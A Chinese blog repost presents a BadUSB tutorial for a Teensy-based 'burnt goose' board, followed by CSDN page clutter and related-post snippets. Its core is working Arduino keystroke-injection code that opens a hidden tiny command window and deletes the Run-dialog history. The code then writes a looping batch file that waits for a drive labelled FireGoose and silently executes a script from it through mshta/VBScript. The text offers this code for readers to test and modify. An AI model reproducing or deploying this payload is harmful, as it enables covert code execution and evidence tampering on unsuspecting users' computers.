中国烧鹅系列:利用烧鹅自动执行SD卡上的自定义程序(含视频)

最新推荐文章于 2024-07-19 11:27:44 发布
最新推荐文章于 2024-07-19 11:27:44 发布
阅读量166 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/small-gray/p/5392051.html
版权

烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板,外观看起来很像USB Rubber Ducky(大黄鸭),但并非Hak5所销售版本。 

所以没有使用USB Rubber Ducky的固件功能,不可以直接使用USB Rubber Ducky的脚本,可以直接使用Arduino IDE来编写自定义代码、也可以使用S.E.T、Kautilya套件生成代码使用。
自带SD卡槽,可外接SD作为扩展,支持BadUSB代码。

FreeBuf报道:《烧鹅:中国人自己的HID Hacking Device》《中国烧鹅系列:利用烧鹅自动获得反弹SHELL》

上期介绍了利用烧鹅自动获得反弹SHELL,总是觉得不太完美,脑洞之后,我们还可以这么玩:利用烧鹅自动执行SD卡上的自定义程序,可以在很短的时间(5秒左右)完成Attack。

原理

烧鹅模拟USB键盘,自动输入Win+R ,为了尽可能的隐藏,开启一个很小的CMD窗口,然后在%tmp%目录写个批处理,后台隐藏执行,每隔5秒监控U盘或者SD卡的指定程序是否存在。若存在就隐藏执行,若不存在就继续循环监控,直到找到指定的可执行文件。

这样就达到了自动执行SD卡上的自定义程序,效果就是,插入U盘之后,指定的程序就自动执行了!

   

以下是demo 代码,各位可以自行测试,自由修改!

 void setup()  {    delay(5000);    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);    Keyboard.set_key1(KEY_R);    Keyboard.send_now();    delay(100);    Keyboard.print("cmd /T:01 /K mode CON: COLS=16 LINES=1");  //开启很小的cmd窗口    Keyboard.set_key1(KEY_ENTER);    Keyboard.send_now();     delay(200);    Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //清理运行记录    Keyboard.set_key1(KEY_ENTER);    Keyboard.send_now();     Keyboard.println("del /f /q %tmp%\\w.bat 2>nul");  //先删除可能存在的批处理    Keyboard.set_key1(KEY_ENTER);    Keyboard.send_now();     Keyboard.println("copy con %tmp%\\w.bat");         //写入新的批处理文件    Keyboard.send_now();     Keyboard.println("@echo off");    Keyboard.println(":lp");    Keyboard.println("ping 127.1 -n 5 >nul");    Keyboard.println("for /F %%A in ('wmic volume get driveletter^,label ^| find \"FireGoose\"') do (set Fire=%%A)"); //利用wim查询指定U盘是否插入电脑    Keyboard.println("IF EXIST \"%Fire%\\files\\Fire_shell.bat\" (copy /y \"%Fire%\\files\\Fire_shell.bat\" %tmp%\\");//若存在指定文件,就复制到%tmp%    Keyboard.println("mshta vbscript:createobject^(\"wscript.shell\"^).run^(\"%tmp%\\Fire_shell.bat\",0^)^(window.close^)) ELSE (goto :lp )");//利用VBS隐藏执行bat    Keyboard.set_modifier(MODIFIERKEY_CTRL); //保存以上写入的批处理    Keyboard.set_key1(KEY_Z);    Keyboard.send_now();    Keyboard.set_modifier(0);    Keyboard.set_key1(0);    Keyboard.send_now();    Keyboard.set_key1(KEY_ENTER);    Keyboard.send_now();    delay(200);    Keyboard.println("mshta vbscript:createobject(\"wscript.shell\").run(\"%tmp%\\w.bat\",0)(window.close) && exit"); //VBS隐藏执行w.bat并退出    Keyboard.set_key1(KEY_ENTER);    Keyboard.send_now();    Keyboard.set_modifier(0);  

转载于:https://www.cnblogs.com/small-gray/p/5392051.html

weixin_30786617
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
badusb_payload(一)添加管理员用户
B0rn_T0_W1n的博客
12-03 3710
badusb_payload添加管理员
一整只烧鹅价格=烧鹅上庄价格+烧鹅下庄价格这个关系不因货币变掉而变
josedoug的博客
05-02 3105
趁看GH在Risk.net发表的有关quanto skew文章的契机写这篇文章介绍衍生品定价的基本理论。 我们从大家都会的一则公式开始: S0=∑ST⋅DT⋅P{S_0} = \sum {S_T\cdot D_T\cdot \mathbb{P}} S0​=∑ST​⋅DT​⋅P 其中STS_TST​是未来价格,DTD_TDT​是折现系数,P\mathbb{P}P是概率。引入概率就说明未来价格是可以是...
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explo注册表病毒
快乐每一天
11-03 6390
[code="java"]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run[/code] [code="java"]删除:2600[/code]
杭州素烧鹅的做法:传统技艺与创新味道
2401_84898276的博客
05-09 273
他们将传统的素烧鹅与现代的烹饪技术相融合,采用新的调味方法、烹饪工艺,甚至将一些新颖的食材加入其中,使得素烧鹅的口感更加丰富多变。这些传统技艺的传承,如同一颗接力棒,代代相传,传递着家族的荣耀和民族的情怀。然而,在现代社会的快节奏发展下,传统手艺慢慢被遗忘,素烧鹅这一传统美食也面临着衰落的危机。为了延续这一独特的味道,有些杭州的厨师们开始尝试将传统与创新相结合,赋予素烧鹅新的生命力。在这个变革与传承并存的时代,从源头出发,不忘初心,将传统技艺和现代创新结合起来,方能走得更远更久。
利用烧鹅制作简单BadUSB,插谁谁怀孕
weixin_34395205的博客
11-14 275
所用硬件设备为烧鹅烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板。 使用veil编码meterpreter生成payload(经过编码的payload在杀软中仅能够存活几分钟),放到服务器上。插入烧鹅,模拟键盘输入,在cmd中下载payload,并执行。 Github:...
HID高级攻击姿势:利用PowerShell脚本进行文件窃取
weixin_33863087的博客
03-25 187
0×01 引言 又到了期中考试了,我又要去偷答案了,一直发现远程下载运行exe的方式不太好,容易报毒所以这里打算用ps脚本。 0×02 关于HID HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HI...
建行吗?帮我订个烧鹅
iteye_8511的博客
12-08 155
  案例1:   今天终于收到骗子的短信了,说我的建行卡在天河城消费9000元,要扣我的钱。提供了一个查询电话是85971106。大家能帮我打这个电话叫一个叉烧饭吗?   Pcc   我:打了,叫了一个叉烧饭,他说他不是快餐店,是建行×××中心   轻如燕   我:打了。麻烦人我来个叉烧、烧鹅饭。   对方吼着说:都说不是送餐电话喽!!!   凉背心 ...
Qt部件学习之-烧鹅
weixin_33835103的博客
03-27 100
Qt部件学习之-烧鹅 1,布局管理器 candidates error: no matching function for call to ‘QGridLayout::QGridLayout(MyWidget* const, int, int)’ QGridLayout *grid = new QGridLayout(this,3,...
中国名菜民族风味
01-01
中国名菜民族风味》这份文档,如同其标题所揭示,是关于中国各地特色菜肴的一份详尽介绍,旨在让读者领略到中国丰富多样的饮食文化。中国的烹饪艺术源远流长,各地区由于地理环境、气候条件以及历史背景的不同,...
中国名菜岭南风味
01-01
中国名菜岭南风味》这份文档,如同其标题所揭示,是关于中国烹饪艺术中独具特色的岭南菜系的详尽介绍。岭南,泛指广东、广西、福建等华南地区,其菜肴以其独特的口味和丰富的食材著称,是中国八大菜系之一。这份...
酒店上什岗位职责
12-30
酒店上什岗位职责通常涵盖了一系列工作内容,旨在确保餐厅提供的食品质量、卫生标准以及服务效率。下面将详细阐述这些职责,并结合“酒店上什岗位职责.DOC”文档中的信息,进行深入解读。 1. **准备工作** - **...
教育秋八年级道德与法治上册第二单元待人之道21诚实守信第1框内诚于心外信于人教学设计粤教版.pdf
11-14
接着,通过情境分析,比如一家著名烧鹅厂家面对诚信考验的选择,让学生讨论如何在实际中坚守诚信。同时,结合学生自己的经历,如考试成绩的报吿,探讨诚实面对问题的重要性。 此外,课堂上还会对诚实守信的内涵进行...
顶空固相微萃取结合GC-MS与GC-O技术分析鉴定福建风味鸭中挥发性风味化合物
01-02
顶空固相微萃取结合GC-MS与GC-O技术分析鉴定福建风味鸭中挥发性风味化合物,何苗,曾茂茂,采用顶空固相微萃取-气质联用技术(HS-SPME-GC/MS)在福建风味鸭中共检测到58种挥发性成分,包括14种醛、10种烃、10种醇,9...
明翰经验系列之旅行篇V1.8(持续更新)
欢迎!欢迎来到17号城市!
12-08 3145
把去过一些比较值得记录的地方记录下来,那么等到若干年之后, 这些回忆都是宝贵的精神财富,等想要回忆的时候,随时可以从自己的大脑中提取这些宝贵的资产, 产生一种精神上的满足感。
Linux热键,shell义及权限介绍
2301_79194984的博客
07-16 809
为了方便能够快速的输入指令,通常利用[Tab]来帮助我们。[Tab]键的作用是具有命令补全和档案补齐的功能。通常为了输入一个指令,我能快要输完的时候按下[Tab],能够快速补齐,能够减少一点时间吧,起始也能够利用[Tab]来帮助我们查看符合那几个开头的指令能有哪些。生活中的例子可以帮助我们理解。VIP才能看最新出来的电影。进学校的宿舍需要刷脸这也是权限。权限就是通过一定的条件拦住一部分,给另一部分人权利,来访问某种资源。来决定有无或者是能不能的问题。
shell处理用户输入——传递参数
2401_82591819的博客
07-17 386
shell脚本传递数据的最基本方法是使用命令行参数。命令行参数允许运行脚本时在命令行中添加数据:本例向脚本addem传递了两个命令行参数(10和30)。脚本会通过特殊的变量来处理命令行参数。接下来将介绍如何在bash shell脚本中使用命令行参数。
WSL2- 使用Shell工具连接的一些配置
最新发布
qq_47910339的博客
07-19 328
WSL2-使用Shell工具连接的一些配置
使用c语言设计一个小程序,帮助我们解决今天的午餐去哪里吃的问题。 比如:输入“10元快餐” “兰州拉面” “烧鹅饭” “智能餐厅” “美团外卖” 随机抽取一个地方
06-01
好的,以下是一个使用 C 语言编写的示例程序,可以帮助您解决午餐选择问题: ```c #include <stdio.h> #include <stdlib.h> #include <time.h> int main() { char options[5][20] = { "10元快餐", "兰州拉面", "烧鹅饭", "智能餐厅", "美团外卖" }; int num_options = 5; char user_input[20]; // 获取用户输入 printf("请输入您想吃的餐厅或餐饮类型:\n"); fgets(user_input, 20, stdin); // 随机选择一个选项 srand(time(NULL)); int index; if (user_input[0] == '\n') { index = rand() % num_options; } else { int i; for (i = 0; i < num_options; i++) { if (strstr(options[i], user_input) != NULL) { break; } } if (i == num_options) { printf("没有找到匹配的选项!\n"); return 0; } else { index = i; } } // 输出结果 printf("今天的午餐去%s吃吧!\n", options[index]); return 0; } ``` 程序首先定义了五个选项,并且使用一个二维字符数组来存储这些选项。程序使用 `fgets` 函数获取用户输入,并且使用 `strstr` 函数来查找用户输入是否与选项匹配。如果找到了匹配的选项,程序就选择了这个选项;如果没有找到匹配的选项,程序会输出提示信息。如果用户没有输入选项,程序会随机选择一个选项。 程序使用 `srand` 函数和 `rand` 函数来生成随机数。为了使每次生成的随机数不同,程序使用了 `time` 函数来获取当前时间,并且将其作为 `srand` 函数的参数。 注意:在使用 `fgets` 函数获取用户输入时,需要注意字符串的长度和结尾的换行符。在本示例程序中,我们假设用户输入的字符串最长不超过 20 个字符,因此我们定义了一个长度为 20 的字符数组来存储用户输入。当用户输入时,字符串的结尾会自动添加一个换行符,因此我们需要在比较字符串时忽略这个换行符。 希望这个示例程序可以帮助您解决午餐选择问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值